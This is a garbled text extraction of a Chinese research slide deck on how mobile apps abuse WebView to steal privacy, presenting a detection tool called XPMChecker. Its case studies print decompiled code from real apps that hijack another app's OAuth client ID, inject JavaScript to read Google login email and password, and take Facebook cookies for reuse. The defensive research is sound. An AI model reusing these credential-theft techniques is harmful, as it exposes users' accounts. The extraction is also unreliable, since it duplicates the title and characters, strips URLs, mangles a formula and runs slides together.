1、移动应用是如何通过移动应用是如何通过WebView窃取你的隐私的窃取你的隐私的目录I.移动应用与WEBII.同安全主体原则（SPP）与XPMIII.XPM自动化检测工具IV.结果与案例分析V.总结与展望移动应用与Web移动应用内集成WEB服务广泛应用于各种功能，如广告，社交分享，用户身份认证和授权复用已有Web代码；适配不同平台，提供一致的用户体验集成方式位于应用内部，提供流畅的交互界面提供丰富的接口，可令应用操作Web网页WebView on AndroidUIWebView/WKWebView on iOSWebView：轻量级应用内浏览器Mobile appWebViewWebView

2、APIWebView提供的API可以操作以下Web敏感资源Manipulated WebResourcesAndroid WebViewiOS UIWebViewiOS WKWebViewLocal StorageCookieManagerNSHTTPCookieStorageWKWebsiteDataStorageWeb ContentloadUrl,evaulateJavascriptstringByEvaluatingJavascriptFromStringevaluateJavascriptWeb AddressonPageFinished,shouldOverrideUrlLoadi

3、ngNetwork TrafficshouldInteceptRequestshouldStartLoadWithRequestdecidePolicyForNavigationAction,decidePolicyForNavigationResponseQ:这些API会被安全的使用吗？App-to-Web Attacks移动应用对加载的WEB资源进行拦截、篡改等操作最主要的方式是通过WebView APIWebApp但是大多数情况下，使用WebView API是安全的。怎样区分App-to-Web Attacks和正常使用场景呢？目录I.移动应用与WEBII.同安全主体原则（SPP）与XP

4、MIII.XPM自动化检测工具IV.结果与案例分析V.总结与展望同安全主体原则SPP与XPM应用集成Web服务并对其敏感资源进行操作时，应用和Web的安全主体（Security Principal）必须一致。借鉴于Web中的同源策略（SOP，Same Origin Policy）同安全主体原则 Same Principal Policy(SPP)Cross Principal Manipulation(XPM)应用安全主体PA 和 Web安全主体 PW 不一致，且应用对Web资源进行了操作XPM示例C1：属于Facebook官方AppC2：属于Chatous App中的Facebook SDK

5、C3：属于Chatous App中的类两个App中的三个类都对Web资源进行了操作C1&C2：not XPMC3：XPM目录I.移动应用与WEBII.同安全主体原则（SPP）与XPMIII.XPM自动化检测工具IV.结果与案例分析V.总结与展望XPM自动化检测工具1.准确识别Web和App的安全主体：第三方库和App自身2.准确比较Web和App的安全主体是否一致：semantic gap挑战Semantic Gap命名的多态性：netease&163缩写：baidu&bdXPM自动化检测工具1.确定代码边界，即与WebView操作相关的代码2.提取代码签名，Merkle-tree的迭代式签名

6、方法3.比较代码签名，识别第三方库解决方法：1.第三方库识别方法XPM自动化检测工具1.在搜索引擎中搜索PA和PW2.将返回结果正规化，使用bag-of-word model和term frequency，生成两个向量3.计算两个向量之间的余弦距离解决方法：2.使用搜索引擎cos%,=+,-.+.+,-A+2?.+,-+2?XPMChecker1.静态分析模块，得到上下文信息2.安全主体识别模块3.XPM分类器三个模块目录I.移动应用与WEBII.同安全主体原则（SPP）与XPMIII.XPM自动化检测工具IV.结果与案例分析V.总结与展望XPMChecker 检测结果发现了21款应用，具有恶

7、意行为，影响近亿台设备同时确认了4款iOS应用，同样具有恶意行为扫描了8w多Google Play应用恶恶意意行行为为应应用用数数量量伪造其他合法App进行OAuth2偷取用户名和密码6偷取并滥用Cookies14注：一款应用具有两种恶意行为案例分析1：伪造其他合法APP进行OAuth1.100-500万装机量2.冒用了另一个合法的app，Tinder的clientId进行授权认证Instaviewpackagecom.instaview.app;publicclassLoginActivity extendsActivity/getTinders client IDString client

8、Id=getTinderClientId();this.webview.setWebViewClient(new WebViewClient()public boolean shouldOverrideUrlLoading(WebView arg1,String url)/check if url is Instagrams OAuth API and extract the acess token for Tinderif(url.startsWith(“ accessToken=url.substring(url.indexOf(“code=”)+5,url.length();/then

9、use this token to access users profile infopackageco.kr.adkingkong.libs.autoinstall;publicclassGoogleWebLogin extendsRelativeLayout/load Google login Web pagethis.webview.loadUrl(“”);this.webview.setWebViewClient(new WebViewClient()public void onPageFinished(WebView arg1,String url)/inject JS to ste

10、al users email and passwordarg1.loadUrl(“javascript:if(document.getElementById(gaia_loginform)!=null)document.getElementById(gaia_loginform).onsubmit=functiononSubmit(form)/extract email and password from the login formemail=document.getElementById(email-display).innerHTML;passwd=document.getElement

11、ById(Passwd).value);”);案例分析2：偷取用户名和密码1.50-100万装机量2.偷取用户的Google账号和密码adkingkong案例分析3：偷取并滥用Cookies1.1000-5000万装机量2.偷取Facebook的Cookies，并以此获取用户敏感信息和发送垃圾消息Chatouspackagecom.chatous.chatous.managers;publicclassFacebookManagerextendsManagerif(CookieManager.getInstance().getCookie(“https:/)!=null)/getFaceboo

12、kcookiescookies=CookieManager.getInstance().getCookie(“https:/);/usethesecookiestoaccessusersFacebookhomepageDefaultHttpClienthttpclient=newDefaultHttpClient();htttpclient.setCookieStore(cookieStore);HttpResponseresponse=httpclient.execute(newHttpGet(“https:/ Attacks，并发现了官方应用商城中的恶意应用2.提出Same Principal Policy，规范应用和Web的交互3.数据发布：https:/xhzhang.github.io/XPMChecker/谢 谢！